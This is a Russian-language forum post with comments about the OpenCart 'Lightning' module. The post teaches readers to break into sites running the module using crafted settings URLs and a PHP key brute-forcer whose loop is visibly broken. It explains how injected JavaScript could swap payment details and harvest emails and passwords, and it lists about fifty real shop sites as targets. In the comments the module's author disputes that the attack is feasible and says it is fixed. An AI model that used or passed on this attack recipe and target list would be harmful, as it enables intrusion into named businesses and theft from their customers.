Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Lightning - когда же наконец-то удалят?


buslikdrev

886 переглядів

Сегодня я вас научу третьему способу взлома сайтов через говномодуль Lightning.

 

Переходим на сайт с этим "модулем" по ссылке https://mi-krsk.ru/index.php?li_op=t&op=v и узнаём версию модуля. Если версия модуля ниже 4.30, то можно попробовать внести изменения без поиска ключа.

Для взлома без ключа нам нужно перейти по ссылке https://lightning.devs.mx/settings4.php?token=&t=&key=

в параметр token подставить результат md5('https://town-shop.net/')

в параметр t подставить результат base64_encode('town-shop.net')

Если без ключа не получилось, то необходимо для параметра key подобрать ключ.

Ключ подбирается следующим образом. Сначала прогоняем от миллиарда и если вдруг не нашло, тогда первый миллиард т.к. в основном генерирует модуль цифру из 9-10 чисел.

Скрытый текст
	if (!empty($_SERVER['HTTP_USER_AGENT'])) {
		$user_agent = $_SERVER['HTTP_USER_AGENT'];
	} else {
		$user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36';
	}

	$context  = stream_context_create(array('http' =>
		array(
			'method'  => 'GET',
			'header'  => "Content-Type: application/x-www-form-urlencoded\r\n" . "Referer: /\r\n" . "User-Agent: " . $user_agent,
		)
	));

	foreach (1000000000 as 2150000000) {
		$sha1 = sha1(sha1($rand));

		if (file_get_contents('https://town-shop.net/?li_op=n&op=test&id=&key=' . $sha1, false, $context) == 'OK') {
			file_put_contents(__DIR__ . '/' . $sha1, false);
			exit('Ключ обнаружен! ' . $sha1);
		}
	}

 

Да долго, поэтому нужно это делать на серверах или иметь 10 компьютеров. Зато потом можно подменять на сайте жертвы платёжные данные, собирать почту, пароли и т.д. Это всё делается при сохранении настроек и вводе своего js скрипта в поле для вывода сообщения о соглашении использования куков.

 

Вот ещё, держите небольшой списочек для пробы:

Скрытый текст

https://vetiver.by/index.php?li_op=t&op=v
https://metamax.by/index.php?li_op=t&op=v
https://luxhome.by/index.php?li_op=t&op=v
https://makpol.by/index.php?li_op=t&op=v
https://mi-krsk.ru/index.php?li_op=t&op=v
https://imperator-tarot.ru/index.php?li_op=t&op=v
https://sana-tex.com/index.php?li_op=t&op=v
https://sandra-socks.ru/index.php?li_op=t&op=v
https://saveauto24.ru/index.php?li_op=t&op=v
https://sharsky.ru/index.php?li_op=t&op=v
https://pandaplay.ru/index.php?li_op=t&op=v
https://galaxy-sport.ru/index.php?li_op=t&op=v
https://galleryparket.ru/index.php?li_op=t&op=v
https://alcovarov.ru/index.php?li_op=t&op=v
https://anarchos.se/index.php?li_op=t&op=v
https://angel585.ru/index.php?li_op=t&op=v
https://granmebel.ru/index.php?li_op=t&op=v
https://www.ourzamzam.com/index.php?li_op=t&op=v
https://sxchudo.ru/index.php?li_op=t&op=v
https://lors.shop/index.php?li_op=t&op=v
https://ratnik.biz/index.php?li_op=t&op=v
https://www.mazlickuvraj.cz/index.php?li_op=t&op=v
https://minecraft-party.ru/index.php?li_op=t&op=v
https://ergonomica-tomsk.ru/index.php?li_op=t&op=v
https://elorex.ru/index.php?li_op=t&op=v
https://crazycarp.com.ua/index.php?li_op=t&op=v
https://airnet.ly/index.php?li_op=t&op=v
https://altanis-bros.com/index.php?li_op=t&op=v
https://probeauty.lv/index.php?li_op=t&op=v
https://psituning.com/index.php?li_op=t&op=v
https://reboss.ru/index.php?li_op=t&op=v
https://kinesiotape.com.ua/index.php?li_op=t&op=v
https://kristinadragomir.com/index.php?li_op=t&op=v
https://starstyle.lv/index.php?li_op=t&op=v
https://kupisafe.com/index.php?li_op=t&op=v
https://perdeler.kz/index.php?li_op=t&op=v
https://svatbenden.com/index.php?li_op=t&op=v
https://pirat.kitchen/index.php?li_op=t&op=v
https://speedio.eu/index.php?li_op=t&op=v
https://speedio.cz/index.php?li_op=t&op=v
https://asianblossom.lt/index.php?li_op=t&op=v
https://saddlyavas.by/index.php?li_op=t&op=v
https://partsua.com.ua/index.php?li_op=t&op=v
https://flyfishdolomiti.com/index.php?li_op=t&op=v
https://ohjoy.ru/index.php?li_op=t&op=v
https://bechet.ru/index.php?li_op=t&op=v
https://clubedorateio.org/index.php?li_op=t&op=v
https://aleriongroup.ru/index.php?li_op=t&op=v
https://battyt.ru/index.php?li_op=t&op=v
https://clamentcustomleather.com/index.php?li_op=t&op=v
https://fotokino.sk/index.php?li_op=t&op=v
https://town-shop.net/index.php?li_op=t&op=v
https://dvere-erkado.cz/index.php?li_op=t&op=v
https://opencartspecialist.com/index.php?li_op=t&op=v

 

Змінено користувачем buslikdrev

  • +1 2

14 коментарів


Recommended Comments

Автор сразу сделал обработку кавычек на своём сервере. Банить его нужно за эксплойты в любой момент.

  • +1 2
Надіслати
23.01.2025 в 10:56, spectre сказал:

смущает количество ру сайтов в выборке

Это как попалось при парсинге 155000 сайтов, дальше мне было лень собирать базу.

Надіслати

Специально ничего не писал сразу, хотел глянуть на реакцию публики и администрации.

Человек выискал уязвимость, не известил автора, написал под нее експлоит и опубликовал вместе со списком потенциальных жертв.

Если уж это не основание для бана, то я уже не знаю )))

 

Теперь по сути "уязвимости". Подобрать ключ в реальных условиях невозможно. 

buslikdrev, сколько времени по приблизительным подсчетам займет перебор 2 миллиардов вариантов ключа твоим методом?

 

Да, я не заметил, что ссылка на политику не экранируется, что теоретически дает мне возможность вживить сторонний JavaScript на сайт клиента.

Естественно, мне нет резона заниматься такими грязными вещами.

 

Все это исправлено в обновлении 4.45.

  • +1 1
Надіслати

Неоднократно коммуницируя с @MaxD по вопросам поддержки у меня не закрадывается и доли сомнения, что он НЕ будет ломать сайты своим клиентам и это тот человек, которому можно доверять.

Ломать возможно сайт и без лайтинга, гораздо проще чем описано выше. и что?

Администрации как минимум следует озаботиться об удалении из списка всех не русских и не рб сайтов. @Moderator

  • +1 1
Надіслати

1. Когда-то, вместо такой завуалированной "защиты" маэстро вставлял просто js файл со своего сервера. И так же на голубом глазу как одна моль, рассказывал басни, ачетакова.

 

2. Позже была история, когда мрак делал тоже самое и долго и упорно озвучивал сказки, про каких-то экспертов по безопасности, которые сказали что так можно. Экспертов не увидели. Дыру увидели. Он её таки прикрыл.

 

3. Допустим, если правда не специально. И тут все дураки собрались, если человек допускает такие школьные ошибки, прежде чем создавать модули и продавать их, пойти поучить пхп?

 

Вопрос риторический.

  • +1 2
Надіслати
24.01.2025 в 14:39, MaxD сказал:

Специально ничего не писал сразу, хотел глянуть на реакцию публики и администрации.

Человек выискал уязвимость, не известил автора, написал под нее експлоит и опубликовал вместе со списком потенциальных жертв.

Если уж это не основание для бана, то я уже не знаю )))

 

Теперь по сути "уязвимости". Подобрать ключ в реальных условиях невозможно. 

buslikdrev, сколько времени по приблизительным подсчетам займет перебор 2 миллиардов вариантов ключа твоим методом?

 

Да, я не заметил, что ссылка на политику не экранируется, что теоретически дает мне возможность вживить сторонний JavaScript на сайт клиента.

Естественно, мне нет резона заниматься такими грязными вещами.

 

Все это исправлено в обновлении 4.45.

Ну камон бро тебе сделали тест, ты не доволен, зачем писать так? Я не Ваш клиент и не друган, человека который выявил - реально дичь!

Тыб отблагодарил товарища , пропросил выявить еще уязвимость и попросил совета… но бли ты просишь. Его банить! За что за твой код?

Надіслати
25.01.2025 в 00:05, COBECTb11 сказал:

За что за твой код?

Он специально их делает, поэтому и обижается, что вынуждают прикрывать.

  • +1 1
Надіслати
25.01.2025 в 03:07, buslikdrev сказал:

Он специально их делает, поэтому и обижается, что вынуждают прикрывать.

Специально для чего?

 

Я вижу, ты не хочешь считать время, потому что тогда вся схема развалится. Я посчитаю вместо тебя )))

 

Один скрипт будет делать около 20 запросов в секунду. 10 компов - 200 запросов в секунду.

Делим 2 миллиарда на 200 = 10 миллионов секунд, это 115 дней, более 3 месяцев.

 

Но в реальности долбежка 200 запросов в секунду очень заметна, и лавочку прикроют за сутки-двое.

Надіслати
25.01.2025 в 11:42, MaxD сказал:

Специально для чего?

 

Я вижу, ты не хочешь считать время, потому что тогда вся схема развалится. Я посчитаю вместо тебя )))

 

Один скрипт будет делать около 20 запросов в секунду. 10 компов - 200 запросов в секунду.

Делим 2 миллиарда на 200 = 10 миллионов секунд, это 115 дней, более 3 месяцев.

 

Но в реальности долбежка 200 запросов в секунду очень заметна, и лавочку прикроют за сутки-двое.

Когешно не мое дело, но вым бы сконтактировать с бусликом, денежкой может поделиться, чтобы как то вам помог идеями, тк это действительно стремное дело(

Надіслати
25.01.2025 в 22:19, COBECTb11 сказал:

стремное дело(

 

Как по мне - то стремное дело это то что буслик продает русским свой кешер и таким способом его продвигает уже довольно давно

 

но если человек гнида и мудак то это уже неважно

 

При обнаружении уязвимости нужно писать автору, а то глядишь и тебе когда-то присунут

 

 

  • +1 13
Надіслати

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.